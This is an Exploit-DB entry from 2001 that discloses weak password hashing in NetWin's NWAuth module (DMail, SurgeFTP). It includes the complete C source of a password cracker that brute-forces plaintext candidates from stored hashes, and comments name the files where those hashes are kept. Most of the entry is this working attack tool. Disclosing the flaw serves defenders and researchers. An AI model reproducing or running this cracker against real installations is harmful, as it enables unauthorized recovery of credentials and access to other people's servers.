NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption

EDB-ID:

21020


Author:

byterage

Type:

local


Platform:

Multiple

Date:

2001-07-20


// source: https://www.securityfocus.com/bid/3075/info

The Netwin Authentication module, or NWAuth, is an external authentication module used by several Netwin products.

A simple one-way hash function is used by NWAuth to perform password encryption operations. As a result, it is trivial for an attacker to compose a list of possible plaintext values or perform some other brute force attack against the data encrypted using the scheme. 

/********************************************************************
 * nwauthcrack.c - NetWin Authentication Module password cracker    *
 * the SurgeFTP encrypted passwords can be found in the admin.dat & *
 * nwauth.clg files in the nwauth.exe directory                     *
 * by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
 ********************************************************************/

#include <string.h>
#include <stdio.h>

FILE *fh;
/* the following table indices refer to the characters our
   generated password may consist of (true/false), since
   we don't want to go into too much trouble when typing
   everything in :) */
const char okaychars[256] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
};

/* DECRYPTION ALGORITHMS */
int enumpwds(unsigned char encrypted[]) {
  int heavycrypt0;
  unsigned int num=0, i, x;
  unsigned char j[256], decrypted[256];
  for(i=0; i<256;i++) { j[i] = 0; }
brute:
  heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
  for(i=0; i+2 < strlen(encrypted); i++) {
    for(x=j[i]; x < 256; x++) {
	  if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) & okaychars[x]) {
	    decrypted[i] = x;
		break;
	  }
    }
	if (x == 256) {
next:
	  if (i == 0) return num;
	  if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
	  for (i=x; i < 256; i++) { j[i] = 0; }
	  goto brute;
	}
	heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
  }
  decrypted[i] = '\x00';
  num++;
  printf("%s\n", decrypted);  
  if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
  for (i=x; i < 256; i++) { j[i] = 0; }
  goto brute;
}
/* DECRYPTION ALGORITHMS END */

void main(int argc, char ** argv) {
  char buf[256]; int k, l;

  printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");
  
  if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return; }
  printf("%s ->\n",argv[1]);
  
  printf("\n%d passwords found for %s\n",enumpwds(argv[1]),argv[1]);
}